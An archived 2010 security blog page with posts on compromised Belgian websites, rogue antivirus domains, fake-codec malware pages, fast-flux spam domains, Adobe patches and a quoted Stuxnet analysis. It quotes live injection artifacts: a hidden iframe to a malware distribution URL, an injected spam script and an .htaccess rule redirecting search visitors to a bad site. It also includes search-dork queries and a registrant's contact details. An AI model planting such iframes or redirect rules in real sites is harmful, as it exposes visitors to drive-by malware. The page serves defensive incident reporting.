08/20/2010

some domains you could consider blacklisting

while you would whitelist some particular sites if you would need them

report from McAfee see security dashboard - my diigolinks (documents)

bo39.jpg

Permalink | |  Print |  Facebook | | | | Pin it! |

Korean Malware IP adress 114.207.244.143

This Ip address has according to Google Badware been a hotbed of malware and infections

 

 

bo38.jpg

as confirmed by trustedsource (HIGH Risk)

 

Permalink | |  Print |  Facebook | | | | Pin it! |

new rogue securityware from my-security93.co.cc passes different antivirus and other protections

 

yes machine in simple user rightsbo37.jpg

yes in Firefox with no script

yes two antiviruses running on the machine

yes behind firewalls, proxies and blacklisting and so on

yes it just popped up and began scanning

just closed down Firefox abruptly (list of applications

No I didn't download or install it because if it can pass that, what else can it do

and the list of viruses that it said it had found changes every time

 

enough to scare the simple user away and if it passes all these securitythings, it must be secure or part of the necessary security no ?

It is NOT blacklisted yet

http://www.robtex.com/dns/my-security93.co.cc.html

and according to Virustotal

Firefox Clean site

Google Safebrowsing Clean site

Opera Clean site

Phishtank Clean site

Smartscreen Clean site

TRUSTe Clean site
http://www.virustotal.com/

It uses the following Korean servers

114.207.244.143
114.207.244.144
114.207.244.145
114.207.244.146

on which there are a whole lot of other .cc servers (some small islands with a frequently abused domainzone)

the technical people responsable are

AS9318
HANARO-AS Hanaro Telecom Inc. Yeoeuido-dong Yeongdeungpo-gu SEOUL 17-7 Asia One Bldg. 150-874

These IP numbers are also used by Malaysian hackers because their sites are hosted there

malaysian-hackers.co.cc

Permalink | |  Print |  Facebook | | | | Pin it! |

08/18/2010

Youtube user thenameisskittles used in online malware campaign with .be sites

It is being done by inserting pages that imitates Youtube pages with videos on other sites

the trick is simple - to view the video one has to download a new codec - but that ain't a codec (it is a virus) but explain that to your teenager who wants to see Justin Beeber and thinks it is some kind of Youtube.

David Evans Controller | management.degarage.nl

Deze site kan schade toebrengen aan uw computer.
DAVID EVANS CONTROLLER. thenameisskittles 18 videos. Subscribe. 151960 views. Help About Safety Privacy Terms . . david evans controller. . david evans ...
management.degarage.nl/random/index.php?news=david-evans.


The Googledork is  youtube thenameisskittles

and for Belgium you add  site:be   you can change that for whatever site or domain you have to be sure

PROTEUS VSM 7.1 SP4

Deze site kan schade toebrengen aan uw computer. (ps all the rest as well)

PROTEUS VSM 7.1 SP4. thenameisskittles 4 videos. Subscribe. ... VSM 7.1 SP4, download PROTEUS VSM 7.1 SP4, EFFECTMATRIX YOUTUBE VIDEO DOWNLOAD TOOL PRO 3.0, ...
www.jolieboutique.be/script/proteus+vsm+7.1+sp4.html

justinbiebermusic.com\/goldenticket

Be sure to subscribe to us, and Turnip Time www.youtube.com Thanks again to all that helped. ..... COM/GOLDENTICKET. thenameisskittles 4 videos Subscribe. ...
os.be/info/justinbiebermusic.com%5C/goldenticket - In cache
  1. BARFOOTANDTHOMPSON.CO.NZ

    7 Jun 2010 ... Barfootandthompson.co.nz. belmont stakes odds . BARFOOTANDTHOMPSON.CO.NZ. thenameisskittles 4 videos. Subscribe . Barfootandthompson.co.nz ...
    gt-motorsports.be/webshop/.../barfootandthompson.co.nz.html - In cache
  2. EZRECORDED 1.0

    EZRECORDED 1.0. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . EZRecorded 1.0 ...
    www.manzi.be/script/EZRecorded+1.0.html - In cache
  3. Hot Video: pilipinas win na win

    13 Ago 2010... Na Win (First Episode) 31 July 2010 Brought to you by FlipBooth – The Pinoy Style Youtube . .... thenameisskittles 18 videos. Subscribe ...
    www.fitstar.be/images/page.php?page=pilipinas+win... - In cache
  4. LADYLADY345

    GROUP/LADYLADY345. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . ...
    www.loomans-distribution.be/catalog/.../ladylady345.html - In cache
  5. /SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE

    SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE. ... /SEARCH HL EN Q SITE WWW.
    YOUTUBE.COM YOUTUBE. thenameisskittles 4 videos. Subscribe. 151960 views ...
    www.leathershop.be/...//search+hl+en+q+site+www.youtube.com+youtube.html - In cache
  6. Hot Video: lil kim

    YouTube streaming video - Lil' Kim & Ray J Take Shots at Nicki Minaj . - During Lil Kim's Concert in New York ... thenameisskittles 18 videos. Subscribe ...
    www.mrwtrading.be/b2b/images/news.php?page=lil... - In cache

Permalink | |  Print |  Facebook | | | | Pin it! |

sleepy.be (commercial site) totally spam-hacked

site:sleepy.be  video as example


Supersize Me Video
Supersize Me Video August 5, 2010. ... Supersize Me Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
motieven.sleepy.be/sleepy/supersize-me-video.html - In cache

Danny Almonte Video
Danny Almonte Video August 8, 2010. ... Danny Almonte Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
motieven.sleepy.be/sleepy/danny-almonte-video.html - In cache

Elke The Stallion
Download Elke The Stallion and Maliah Michel (Digital Dolls) video on savevid.com. ... I give you video model Elke the Stallion. Checkout her site, crazy. ...
motieven.sleepy.be/sleepy/elke-the-stallion.html - In cache

Khia New Video
12 Aug 2010 ... Khia looks so excited to be trapped in a TV in Janet's new video . On the heels of her new single, “Been A Bad Girl,” Khia took time off . ...
motieven.sleepy.be/sleepy/khia-new-video.html - In cache

Cspan Video
8 Aug 2010 ... Cspan Video August 8, 2010. ... Cspan Video. Template design by Free CSS Templates · cynthia rodriguez · lake county indiana ...
motieven.sleepy.be/sleepy/cspan-video.html - In cache

Royce Reed Video
6 Aug 2010 ... Royce Reed Video August 6, 2010. ... Royce Reed Video. Template design by Free CSS Templates · tommy bowden · phiten necklaces ...
motieven.sleepy.be/sleepy/royce-reed-video.html - In cache

Pygmy Tarsier Video
Pygmy Tarsier Video August 7, 2010. ... Pygmy Tarsier Video. Template design by Free CSS Templates · brooke astor · mark loretta · highdeas · matt holliday ...
motieven.sleepy.be/sleepy/pygmy-tarsier-video.html - In cache

City High Caramel Video
6 Aug 2010 ... City High Caramel Video August 6, 2010. ... City High Caramel Video. Template design by Free CSS Templates ...
motieven.sleepy.be/sleepy/city-high-caramel-video.html - In cache

Permalink | |  Print |  Facebook | | | | Pin it! |

Belgian site uses Justin Bieber to place malware

Jamie Bieber Boyfriend Hot Video

27 Jul 2010 ... jamie bieber boyfriend hot video · jamie boyfriend hot video justin bieber · bieber boyfriend hot video jamie foxx ...
motieven.sleepy.be/.../jamie-bieber-boyfriend-hot-video.html
This gives this
person: Vadim Makarenko
address: Leningradskaya 28 kv 26, Bendery, Moldova
e-mail: XXXXXXX@gmail.com
phone: +373-680-45324
nic-hdl: VM3351-RIPE
source: RIPE # Filtered

This is a redirect

It tries to install malware

they didn't see it since the 27th of july ..... we are the 19th

going to report it to the CERT here

Panda labs found another 200 such sites

just tried the obvious title with site:be and found this one but you can do this for any other country of domainextension

"hot video : justin bieber" site:be

Permalink | |  Print |  Facebook | | | | Pin it! |

critical ADOBE PDF and flash updates

Adobe is planning to release critical updates on August 19, 2010 for Adobe Reader 9.3.3 for Windows, Macintosh and Unix as well as the Adobe Acrobat 9.3.3 for Windows and Macintosh and an update for Adobe Reader 8.2.3 and Acrobat 8.2.3 for Windows and Macintosh covered in security bulletin APSB10-17. An update for Adobe Flash Player published in security bulletin APSB10-16 will be released as well.

Affected Software

Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh

Adobe Flash Player 10.1.53.64 and earlier versions for Windows, Macintosh, Linux, and Solaris
http://isc.sans.edu/index.html

You have no choice but to install them - the number of attacks on these vulnerabilities is too big and the botnets that use them (Zeus for example) are too dangerous

 

Permalink | |  Print |  Facebook | | | | Pin it! |

08/17/2010

stad mechelen forgot about its old blog but spammers didn't

You have the website stadmechelen.be that now resolves to mechelen.be

under stadmechelen.be that is still active you have blog.stadmechelen.be but that doesn't resolve to blog.mechelen.be or a www.blog.stadmechelen.be but has been transferred to mechelenblogt.be

so far so good but

as the website stadmechelen.be is still active (in a redirect) blog.stadmechelen.be is also still active

and has been abused by the following injected script

<title>Best Searches</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" media="all" href="http://find.gl/js.css" />
<script>
function init_aw(){
var children = document.getElementsByTagName('td');
var l = children.length;
var ri = 0;
for(i=0;i<l;i++){
if (children[i].className=='ac'){
children[i].onmouseover=function (){this.className='ach';};
children[i].onmouseout=function (){this.className='ac';};
children[i].onclick=new Function('document.location="' + results[ri][3] + '";');
ri++;
}
}
}
</script>
</head>
<body>
<script src="http://find.gl/js.php?qr=3&f=h&q=inurl%3Acracks%2..."></script>
<script>document.onload=init_aw();</script>
</body>

and that gives you the following search results

crack black and white 2 , download, cd to mp3 ripper v 5.2 serialz, counter strike license torrent,
www.blog.stadmechelen.be/7645 · Pagina in cache

EWallet cell phone, download nitto 1320 cheat engine, 228289, crack sonar 4.01 producer edition,
www.blog.stadmechelen.be/5951 · Pagina in cache

sonic pc download full, update firmware dth 222 2006, katja kassin sex and submission movie,

for the foreign readers
* mechelen is a big city around brussels
* it has its fair amount of problems and possible risks
* its official website is according to official rules from the government one of the main instruments of crisiscommunication if needed

Permalink | |  Print |  Facebook | | | | Pin it! |

observatoire du tourisme Wallonie.be infected with Viagra spam

link


Lkioweytrert generic zovirax - zovirax what is it viagra valium kamagra discreet uk europe - las vegas kamagra viagra about valtrex aciclovir zovirax - when does patent on valtrex expire imitrex story - purchase imitrex cash on del what is paxil - how ...
observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

DrLaquanda 1, cheap viagra in moldova, kmb, purchase zovirax in djibouti, gcnrcx, purchase sumycin in iowa, 016928, buy biaxin er online without a prescription, ldm, buy darvocet in alberta, knk, buy cheap tadalafil online cheap vs generic., :-]],
observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

SynxavIQZxwdi tramadol imq viagra ljpem xanax hun buy 150 tramadol =] acomplia qjws Proposé le 23 mai 2010, par TRJdivGdAAK tYMwqLGQnhuXmg no prescription cialis 41514 retin :-[ buy href tramadol 363 ultram pill identifier 4856 tramadol
observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

http://miguelcabrera.us/index.html comment5, Tamiflu, Zithromax, Nolvadex, Retin-A, Viagra, Metformin, Proposé le 13 juillet 2010, par Ambien http://tulowitzki.us/index.html comment5, Xanax, Tamiflu, Nolvadex, Retin-A, Bactrim, Proposé ...
observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

DrLou 1, cheapest sale viagra purchase viagra buy in uk high quality. online no prescription ! !, [url="http://wvagp.org/Forums/members/Buy-VIAGRA-On-Line.aspx"]cheapest sale viagra purchase viagra buy in uk high quality. online no ...
observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

Permalink | |  Print |  Facebook | | | | Pin it! |

a hidden compromised website : now the php trick

We have seen in the previous post how one attacker hides his victory by using the Apache server modules to differ the kind of pages to show to the normal visitors (the website) and the searchengines (the spam/scam pages he added).

There is also another trick one can do according to the Internet Storm Center.

One can add on a PHP site a script that will tell the controller of the PHP server which page to serve to who and its instructions would be more or less identical.

"The attackers planted one file (usually called page.php or wp-page.php) on every web site – they didn’t change anything else. The page.php script does the majority of work. It actually just asks the main controller what to do when it receives a request. The request sent to the controlled is interesting – it downloads another PHP script from the controller and executes it via an eval() call. This allows the attackers to be able to constantly change how any script behaves. This master script, in a nutshell, does this:

First it checks if the request to the page.php script contains the “r=” parameter. If it doesn’t (meaning, you accessed the script directly) it displays a 404 error. Clever, so they hide it if you try to access it directly.

1. if the User Agent shows that the request is coming from a Google, Yahoo or Bing bot, special content with links to rogue securityware is returned.

2. if you visit the script directly (no referrer) it again displays a 404 error.

3. if the referrer is set to Google, Yahoo or Bing (meaning, the user clicked on a search result), the browser is redirected to a third site (and possible fourth) that displays the infamous RogueAV"

The rest of the technicalities is explained in the post but it is clear that if you use PHP you should patch and harden everytime anytime and if you can't do it yourself you should be sure that some hoster is doing that for you, otherwise one moment or another you will be cooked.

Permalink | |  Print |  Facebook | | | | Pin it! |

another twist in compromising websites - htaccess control and searchengine poisoning

We have seen that some malvertising (and the driveby malware downloads or redirects) are only shown to a certain number of visitors and this was also seen in some dns poisoning if i remember it well.

In this post from the Internet Storm center there is something even more interesting - trying to hide the fact that a site is compromised (probably against searchengines and securitybots scanning for infections and take-overs).

The same site is sometimes infected/takenover and sometimes not, just the normal library site.

"Rather than mucking around with the code for the site itself, the bad guys target the .htaccess files.  For those of you unfamiliar with the workings of webservers, .htaccess files are used by the Apache webserver (and some others…) to provide a way to make configuration changes to the server itself, on a per-directory basis.  So, for instance, you can use an .htaccess file to change the way that the webserver treats specific types of files in a single directory only.

The bad guys also leverage another Apache “tool,” known as mod_rewrite. This tool provides a rule-based rewriting engine (based on a regular-expression parser) to rewrite requested URLs on the fly.

So, while I never actually got my hands on an altered .htaccess file, I have a pretty good idea of what they look like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*(cialis|viagra|levitra).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*(cialis|viagra|levitra).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*(cialis|viagra|levitra).*$
RewriteRule .* http://badsite.com [R,L]

http://isc.sans.edu/diary.html?storyid=9388"

The result is that when Google comes by they will index the added pages with scams and spam in the best case and porn and pirated films or creditcards in the worst case. This should show up in your logs - if they didn't change the logging to suppress it for these new pages. Your normal visitors and probably yourself will see nothing of that and will work on a normal website like ever before.

It means that you need a tripwire like monitoring of everything of your webserver. If something changes somewhere you should know or be able to know.

 

Permalink | |  Print |  Facebook | | | | Pin it! |

Humo, libelle, telemoustique were lucky, others still sleeping malware agents for nemohuildiin.ru

first not all sites or pages that are shown in googledorks are in fact still infected, the reason is that they didn't indicate to Google that they were the owners of the domain and that Google didn't came back after the clean-up.

But it does show that these sites were injected with this kind of scripts and maybe haven't reviewed their securitypolicies and can in future again be abused.

If you read the post on the Internet Storm Center that is it interesting that those infections for the moment were not only very professional but they didn't load any malware... untill when. When you take into consideration that the site in question is on the list of the Zeus Botnet command and control servers, you can only assume that they were building a new network for a new attack (linked to spam that would have sent their users to these pages on these normal trustworthy popular websites of popular magazines). Or that some of the network has been disbanded or overtaken and that they couldn't get access to their infected 'sleeping cells'.(terrorism language)

and this advice you should post on your wall somewhere

"SQL injection is bad and something people need to avoid by developing web applications safely. There are some tips for this:

  • Sanitize input data: Input entered from the user should not contain any sql sentences or commands at all. Check for good data by validating for type, length, format, and range.
  • Use store procedures: Your web application should have predetermined SQL sentences for data access. If the user request some specific information, the application invokes the specific store procedure, so there is no possibility of crafting dynamic SQL request.
  • Use an account with restricted permissions in the database. You should only grant execute permissions to selected stored procedures in the database and provide no direct table access.
  • Avoid disclosing database error information. Make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to check if the attack was unsuccessful."

http://isc.sans.edu/diary.html?storyid=9397

 

 

Permalink | |  Print |  Facebook | | | | Pin it! |

08/16/2010

fastflux botnet campaigns with .eu domainnames

Arbor Networks

iseveral.eu
lifestylerxdrugs.eu
medicationjobs.eu
nypharmacyjobs.eu
rxdrugscentral.eu
rxdrugsdot.eu
rxdrugsinc.eu
selfcarepharmacy.eu
superhotpharmacy.eu
yourchoicepharmacy.eu

these are pure fastflux domainnames that can only be blocked by the .eu operator (belgian based)

It is clear that many of those new fastflux domainnames are being used for healthspam campaigns

Many of  them are .ru domainnames (and .com and .net but you can't block these domainextensions)

Permalink | |  Print |  Facebook | | | | Pin it! |

securityproblems with NTML make me laugh

There has been some problems with NTML and some hype and crisiscommunication about it

But NTML was never intended to be a very secure protocol for communication and authentification.

In windows7 it is standard OFF.

You should use Kerberos.

Don't go on trying to fix that old NTML, just use Kerberos or smartcardauthentification or whatever

and for the articles, it is summertime...

Permalink | |  Print |  Facebook | | | | Pin it! |

small hosters and ISP's targeted by malware hosters

not to attack you

but to pay you real hard dollars for hosting

as long as you don't ask too many questions

and don't have too much security

and don't respond too quickly to complaints about me

 

it is being seen in fact the last year but is becoming more a method of 'flux hosting' jumping from one to another

The problem with such small ISP's/hosters is that in small countries they are so important in their own country/network that many other businesses and even government services have an impact when the world begins to blacklist the whole network/host/domainzone.  As it are small networks or countries most of the world doesn't care a bit about their network or domainextension because the relative influence in nihil.

Just block it, we don't have time for this, that they clean up their business and than we will see afterwards, have more important things to do for a domainextension, network or country very few care about.

This is what is happening with .lv (latvia) and spamhaus (and the securitycommunity siding with spamhaus)

So even if you are a small hoster, ISP, network, domainextension you still need to

* have a general minimal security-installation (antivirus, firewall, IDS,....)

* have a contactable securityteam that responds quickly to incidents that are brought to their attention or that they have detected

otherwise you are just thrown in the blackhole of the internet, ready to be forgotten

Permalink | |  Print |  Facebook | | | | Pin it! |

better a Web application firewall than having to make your pages turn into this

when some big Belgian sites where attacked with the Zeus redirection scripts, they had to act swiftly because Belgian visitors were actively being redirected

so they disactivated the html and the scripts and the links

but this makes some old pages look ugly

bo36.jpg

the alternative is setting a WAF with a blacklist before your sites - filtering in and outgoing traffic - to defend yourself and your visitors/clients - and your income as you can't be used to attack others and be sued for it.

Permalink | |  Print |  Facebook | | | | Pin it! |

when you have cleaned up your sql injections, go to Google

As long as you didn't go to Google, register yourself and insert the code that you are the domainowner in your websites, you can't ask Google to revisit your pages quickly and to forget that once you were infected or hacked

A many sites today are still in Google as being hacked or injected

Those that were injected run the most chance of just being blocked by lists and crawlers

and who will want to go to a page for which it receives a warning ?

while there are thousands of other pages from your competitors to visit who don't have such a warning ?

example
Links | Libelle
Libelle is het blad voor de actieve vrouw, die niet alleen haar gezin belangrijk vindt, maar ook haar eigen ontwikkeling en de wereld waarin ze leeft.
www.libelle.be/lib/op-stap/links.html?subcatId=113 - En caché
Mostrar más resultados de www.libelle.be

Te koop - ABIP IMMO
Gemeente: Roosdaal<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> Prijs: € 285.000,00 ...
www.abipimmo.be/showresults.asp?Tid=322 - En caché - Similares

It also means that all those searches for scripts and hacks that show thousands of pages aren't necessarily true but they do show the least that the person didn't finish the job completely (so can you expect them from also blocking the injections in future ?)

once attacked always scanned and attacked

Permalink | |  Print |  Facebook | | | | Pin it! |

finding infected posts with trustedsource.org (telenet, belgacom and other Belgians)

When you go to www.trustedsource.org you can type in the name of the domain and than you will see if it is generally trusted or not

If you have more than one post  or server that may send mail you will see further down the page the change of number of emails that are being sent from this post or server.

Normally an increase of at least 100% will probably have something to do with a virus or spamoperation

Let's taken for example http://www.trustedsource.org/query/telenet.be

Than you will find the following posts that are according to this analysis as probably infected (all on sunday)

http://www.trustedsource.org/query/81.82.254.17

http://www.trustedsource.org/query/81.82.233.5

http://www.trustedsource.org/query/84.199.49.98

http://www.trustedsource.org/query/81.82.197.34

If we take skynet.be

http://www.trustedsource.org/query/194.78.197.208

http://www.trustedsource.org/query/194.78.221.215

or scarlet.be

http://www.trustedsource.org/query/62.235.228.87

http://www.trustedsource.org/query/62.235.232.224

http://www.trustedsource.org/query/62.235.241.85

http://www.trustedsource.org/query/62.235.242.195

http://www.trustedsource.org/query/62.235.249.90

http://www.trustedsource.org/query/81.11.183.156

and so on

this means that all those posts are sending spam and viruses on the world wide web where they have been captured by honeypots.

this means that the ISP's have a problem with their argument that they are defending their walls instead of offering free securityware to their clients as the New Telecom asks them to

 

Permalink | |  Print |  Facebook | | | | Pin it! |

08/12/2010

patching and security of applesoftware on windows comes second

When I read this blogpost of this researcher who found another critical bug in Safari (swiss cheese) the following is clear

* the internal securitytests for Safari are not that sufficient

* they first fix the bug for the Apple environment and than eventually will research and patch the bug for the windows environment

If this is true, it changes the risk of letting users use safari (or maybe any other apple software) on your windows network..... If you even thought that would be a good idea.

Permalink | |  Print |  Facebook | | | | Pin it! |

an absolute must read for people working with scada and critical infrastructure

If what is written in this blog wouldn't be that important I wouldn't have copied it in its entirely. But if you read what the researchers have found out about stuxnet (the father of the .lnk vulnerability that is now also present in documents) than you will see that you will have to monitor every change of code that happpens in a machine. For the moment this is only for these particular installations but it maybe the next generation of rootkits that we maybe should could 'codekits' that replace one set of code with another set without changing anything on the outset in the availability and functionality of the machine or application.

"As we’ve explained in our recent W32.Stuxnet blog series, Stuxnet infects Windows systems in its search for industrial control systems, often generically (but incorrectly) known as SCADA systems. Industrial control systems consist of Programmable Logic Controllers (PLCs), which can be thought of as mini-computers that can be programmed from a Windows system. These PLCs contain special code that controls the automation of industrial processes—for instance, to control machinery in a plant or a factory. Programmers use software (e.g., on a Windows PC) to create code and then upload their code to the PLCs.

Previously, we reported that Stuxnet can steal code and design projects and also hide itself using a classic Windows rootkit, but unfortunately it can also do much more. Stuxnet has the ability to take advantage of the programming software to also upload its own code to the PLC in an industrial control system that is typically monitored by SCADA systems. In addition, Stuxnet then hides these code blocks, so when a programmer using an infected machine tries to view all of the code blocks on a PLC, they will not see the code injected by Stuxnet. Thus, Stuxnet isn’t just a rootkit that hides itself on Windows, but is the first publicly known rootkit that is able to hide injected code located on a PLC.

In particular, Stuxnet hooks the programming software, which means that when someone uses the software to view code blocks on the PLC, the injected blocks are nowhere to be found. This is done by hooking enumeration, read, and write functions so that you can’t accidentally overwrite the hidden blocks as well.

Stuxnet contains 70 encrypted code blocks that appear to replace some “foundation routines” that take care of simple yet very common tasks, such as comparing file times and others that are custom code and data blocks. Before some of these blocks are uploaded to the PLC, they are customized depending on the PLC.

By writing code to the PLC, Stuxnet can potentially control or alter how the system operates. A previous historic example includes a reported case of stolen code that impacted a pipeline. Code was secretly “Trojanized” to function properly and only some time after installation instruct the host system to increase the pipeline's pressure beyond its capacity. This resulted in a three kiloton explosion, about 1/5 the size of the Hiroshima bomb.

Thus, in addition to cleaning up the Stuxnet malware, administrators with machines infected with Stuxnet need to audit for unexpected code in their PLC devices. We are still examining some of the code blocks to determine exactly what they do and will have more information soon on how Stuxnet impacts real-world industrial control systems.

Finally, we’ve reserved the in-depth technical details on how Stuxnet achieves this rootkit functionality for a future technical whitepaper, which will delve into other features of Stuxnet as well that we haven’t had a chance to blog about. For example, a couple of other interesting things include the fact that it uses an infection counter before deleting itself (it is set to ‘3’) and also can use MS08-067, the same vulnerability used by Downadup (a.k.a. Conficker) to spread.

So, please stay tuned.
http://www.symantec.com/connect/blogs/stuxnet-introduces-...

THis will be a must read report that will make waves and may be the first step into integrating versioncontrol and tripwirelike monitoring an integrated part of the infrastructure and applications.

Sorry for copying but this post is so well written and you should read it now and not later when you have time that I have copied it in its entirely. I do this very very seldom and it is only because of the enormous importance of what is discovered that I have done so.

Said somebody something about holidays ? Maybe all those hackers and malwaremakers were bored .....

Permalink | |  Print |  Facebook | | | | Pin it! |

1 2 3 4 5 6 7 8 Next